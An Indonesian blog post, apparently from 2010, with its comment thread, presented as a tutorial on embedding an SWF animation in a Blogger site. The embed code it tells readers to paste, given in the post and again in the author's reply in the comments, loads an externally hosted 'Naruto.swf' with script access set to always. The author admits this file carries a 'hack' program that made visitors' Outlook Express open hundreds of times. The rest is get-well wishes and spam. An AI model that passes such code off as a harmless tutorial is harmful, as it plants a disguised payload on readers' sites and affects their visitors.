3.20.2010

Memasang embed SWF pada blogger

Alhamdulillah akhirnya saya bisa membuka dasboard blogger dan update meskipun dikit, buat temen2 blog yang udah nge-add fb saya, pasti dah tau apa alasan saya jarang update.....Saya flu berat di tambah demam yang menjangkiti beberapa hari ini, sehingga ndak berani keluar rumah, ini pun saya make PC suit dengan profider M3 yang lemot abis untuk update blog, 
Makasih atas komentarnya di posting saya terdahulu, saya melihat ada 70 komentar yang mana itu adalah rekor komentar terbanyak di blog saya yang semrawut ini.
Untuk memasang embed SWF di blog anda silahkan buat dulu file nya dengan Macromedia Flash, kemudian simpan dalam format Shock Wave Flash (SWF) lalu di simpan ke webhost seperti ripway atau 000space. 
Setelah file tersimpan, ambil Direct Link nya dan pasang melalui Gadget Javascript/HTML dengan menambahkan kode berikut :

<embed quality="high" allowscriptaccess="always" flashvars="alink1=http://www.secretoftrifle.co.cc/" type="application/x-shockwave-flash" height="100%" src="http://fbprofile6574893.webege.com/Naruto.swf" width="100%" wmode="transparent"></embed>
Ganti URL merah dengan URL blog anda dan ganti URL hijau dengan URL swf anda.

SWF sendiri adalah sejenis gambar animasi yang bisa di sisipi program, contoh direct link yang saya pasang di atas (Naruto SWF) adalah jenis SWF yang saya sisipi program hack komputer,
Untuk itulah saya sekalian minta maaf untuk Dek Anin yang manis, Kang Buwel, Pak Eka dari Cerita Tugu, A-Chen, Faat, Oktri dan kawan-kawan lainya yang sempet ngeklik alamat blog hack yang saya berikan.
Maaph Bgt yah semua...Maaph klo Outlook Ekspres nya keluar terus sampe 200 tab lebih......Maappppphhhh bgt........
Oh Ya...saya akan berusaha bales komentar temen2 semua...tapi klo ada komentarnya belum saya bales, mohon maaf karena badan saya sedang meriang......Klo berkenan silahkan temen2 berkomentar di sini, kalau ada yang punya lebih dari satu blog, silahkan komentar dengan semua alamat blog kalian, saya janji...kalau raga ini di beri kesehatan lagi, akan membalas budi baik akan komentar temen2 semua.....selamat malam dan happy blogging!!!!

49 komentar temen:

Adib from kompinter mengatakan...

Wa ilmu bermanfaat Friend Thax ya!!Ini yang aku cari Tp apa g bikin Blog Lemot bos!!

blog buat bloggers mengatakan...

Mantabbb tutorialnya sob, Good post

Adib from kompinter mengatakan...

Mas aditiya Da mampir Di postinganku yang Widget wajib bloggewr indonesia ta?

Cerita Tugu mengatakan...

absen dulu, dah sembuh mas Adit flunya

TOMO mengatakan...

Aku coba dulu kawan.jadi ingin tahu nih

Aditya's Blogsphere mengatakan...

@abid...belum nih mau tak lihat

munir ardi mengatakan...

tutorial yang sangat bermanfaat, saya senang melihat orang pintar dan berbagi ilmunya

Laksamana Embun mengatakan...

Thanks buat ilmunya sobat...

Cepat sembuh ya...

Clara mengatakan...

cepet sembuh ^^

hehe, potonya ga dipasang lagi. gantian sama cewek lain XD

Fi mengatakan...

semua ilmunya ada disini, yang tips kemarin belum dicobain . eh kini dah keluar varian yang baru lagih...

siip siipp

blogdunia mengatakan...

wah pantesan saya gk liat batang hidung kang adit akhir akhir ini ternyata piye toh,,
moga lekas sembuh kang,,
terima kasih infonya,,
memang ane sedang mempelajariya,,

Girant_31 mengatakan...

low swf dipasang di pojok blog gt gmn mas scriptnya???

anyin mengatakan...

ngga apa kok mas adit.. dimaafin hehe

Rock mengatakan...

Makasih untuk tutorialnya mas...

a-chen mengatakan...

woooow, selalu keren memang... memang keren!

buwel mengatakan...

wah, jadi karena ilmu ini thoh.... heheheheh
thanks mas adith.... :-)

Ivan Kavalera mengatakan...

Banyak istirahat dan minumair putih hangat banyak-banyak jug aya mas. Biar cepat sembuh demamnya. Walau sakit, tetap saja mantap nih tutorialnya.

Rock mengatakan...

Maaf mas sampe kelupaan... hahaha... besok saya carikan dulu ya...

bizwud mengatakan...

kunjungan pertama, salam kenal.

blogdunia mengatakan...

Mampir lagi neh mas adipi koment yang sebelumnya belum di konfirmasi ia,,
gpp deh,, ?
masih sakit ia,,

aku doain lagi moga cepet sembuh dan bisa menjalani aktivitas blogwalking again.

Seti@wan Dirgant@Ra mengatakan...

Tutorial mantap sobat. makasih banyak.
Mohon maaf baru sempat mampir. Rutinitas kerja menjelang ujian membludak, setiap hari saya cuman sempat posting. BW jarang apalagi buka FB. Sekali lagi mohon maaf.

axrom mengatakan...

Info menarik sobat,slam kenal..

mas acrom mengatakan...

terima kasih infonya sob,

Free Gift mengatakan...

Info menarik sobat,oh ya kalo anda mau dapat hadiah gratis bisa kunjungi saya .

secangkir teh dan sekerat roti mengatakan...

wew...

bagus nih pak :)

richo mengatakan...

wah ilmu menarik..... tambah sedikit pinter nih heheheh

Herdoni Wahyono mengatakan...

Kita tambah ilmu tentang 'memasang embed SWF pada blogger'. Trims info dan tutorialnya yang mantap, menarik dan komunikatif sekali.

Bunglon Blog mengatakan...

waha lagi sakit y sob, semoga lekas sembuh sobat jaga kesehatan nanti tak bawakan secangkir kopi hangat hehe...
sukses sobat!

Newsoul mengatakan...

Siiip. Mampir kesini selalu mendapat ilmu. Gimana, flunya sudah sembuh belum dit ? cepat sembuh ya.

AdityaBlogsphere2 mengatakan...

@Girant31

Terimakasih atas pertanyaanya, untuk membuat flash berada di satu sisi blog (pojok atau tempat2 tertentu di blog kita) cukup dengan memodifikasi script seperti berikut

cari kode ]]></b:skin>
lalu pastekan kode di bawah ini tepat di atas kode tadi :

#gambar_pojokan {
position:fixed;_position:absolute;bottom:0px; right:0px;
clip:inherit;
_top:expression(document.documentElement.scrollTop+
document.documentElement.clientHeight-this.clientHeight); _left:expression(document.documentElement.scrollLeft+ document.documentElement.clientWidth - offsetWidth); }


lalu cari kode </body> pastekan kode berikut di atas kode tersebut :

<div id="gambar_pojokan">
<embed quality="high" allowscriptaccess="always" flashvars="alink1=http://www.secretoftrifle.co.cc/" type="application/x-shockwave-flash" height="100%" src="http://fbprofile6574893.webege.com/Naruto.swf" width="100%" wmode="transparent"></embed>
</div>


Itu untuk di kanan bawah...terimakasih

Cerita Tugu mengatakan...

inyong belum mudeng nih apa itu swf

Girant_31 mengatakan...

Saya coba dulu ya mas..

KucingTengil mengatakan...

hihiihihi gantian sakitnya. kmrn mia yg tepar krn flu seminggu. cepat sembuh aja yaaaa

genial mengatakan...

selalu sajja ada yang bisa di ambil manfaatnya jika berkunjung ke sini... tp kanmg, terus terang, saiia uda gag pake swf2an ajja orang2 bilang... uabbotteee tenaann.. :( hiks hiks hiks :(

Itik Bali mengatakan...

Aku mampir mas..ojok diwarah sombong
aku marah soalnya pernah dihapus komenku
padahal komenku begitu indah..
heheheheh

Adib from kompinter mengatakan...

Wa mantab ni Kunjungan Siang Mas suka Bangat ma Naruto ya!!

Lina mengatakan...

loh, sakit ya.semoga cepat sembuh ya dit.

berita untuk negri mengatakan...

semoga cepat sembuh ya mas adit,,say simpan dulu dan nanti saya coba,,mantap mas adit..

Bunglon Blog mengatakan...

halo sob, gimana kabarnya sudah sehat kah?
mampir sebentar sob,
ada sedikit kenang2an dari saya semoga berkenan menerimanya sob
sukses slalu!

ninneta mengatakan...

Apaan lagi nih Dit... hehehehhe.... eh gimana black competition nya? siapa yang menang dit? eh udah apa belom ya?

Anggara mengatakan...

jangan sakit, ayo terus ngeblog !

ninneta mengatakan...

Guys,

Support The Earth Hour, by turning off all the electricity for an hour on Saturday, March 27'th 2010, 8.30 pm.

Dukung The Earth Hour, dengan mematikan semua lampu dan listrik selama 1 jam, pada hari Sabtu, 27 Maret 2010 mulai dari jam 20.30 malam.

This is the least we can do....


Love the Earth...

Ninneta

Darin mengatakan...

wah salut, kondisi begitu masih bisa posting. yang sabar aja sob, oks.
ok, nice info nih :)

dijappe mengatakan...

thaanks :DD

Anonim mengatakan...

I suggest you to visit a site on which there is a lot of information on this question.

Anonim mengatakan...

Your opinion is useful

Anonim mengatakan...

I consider, that you are mistaken. I can prove it. Write to me in PM, we will discuss.

Anonim mengatakan...

There is always a light at the end of the tunnel.

Anonim mengatakan...

It is not what you know, but who you know.